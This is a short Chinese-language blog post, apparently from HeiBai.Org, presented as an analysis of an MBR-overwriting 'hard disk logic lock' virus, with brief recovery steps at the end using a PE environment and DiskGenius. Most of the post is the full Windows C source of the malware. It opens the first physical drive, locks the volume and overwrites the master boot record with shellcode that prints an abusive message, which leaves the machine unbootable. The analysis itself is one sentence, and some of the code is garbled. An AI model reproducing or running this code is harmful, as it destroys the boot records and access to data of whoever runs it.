硬碟邏輯鎖病毒源代碼分析&恢復方法-HeiBai.Org

05-10

先研究一下硬碟邏輯鎖代碼。主要是重構MBR以及寫入。

附上代碼:

#include#include#include#include//這一段是 shellcode 可以修改// I am virus! Fuck you unsigned char scode[] ="xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c""x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x76x69x72""x75x73x21x20x46x75x63x6bx20x79x6fx75x20x3ax2dx29";int KillMBR();int main(){

KillMBR(); return 0;
}int KillMBR(){
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;

BYTE pMBR[512] = { 0 }; // 重新構造MBR
memcpy(pMBR, scode, sizeof(scode)-1);
pMBR[510] = 0x55;
pMBR[511] = 0xAA; //打開磁碟
hDevice = CreateFile

(
_T("\\.\PHYSICALDRIVE0"),
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL

); if (hDevice == INVALID_HANDLE_VALUE)//打開失敗返回
return -1;
DeviceIoControl
(

hDevice,
FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0,
&dwBytesReturned, NULL
); // 寫入病毒內容
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0,
&dwBytesReturned, NULL
); //關閉磁碟
CloseHandle(hDevice);
ExitProcess(-1); return 0;
}

硬碟邏輯鎖硬碟邏輯鎖病毒源代碼分析&恢復方法技術文章

如果不慎運行，恢復辦法:

1.啟動到PE環境下

2.運行DiskGenius->菜單->搜索丟失的分區並按提示重建分區表

3.菜單->重建引導記錄

4.保存重啟即可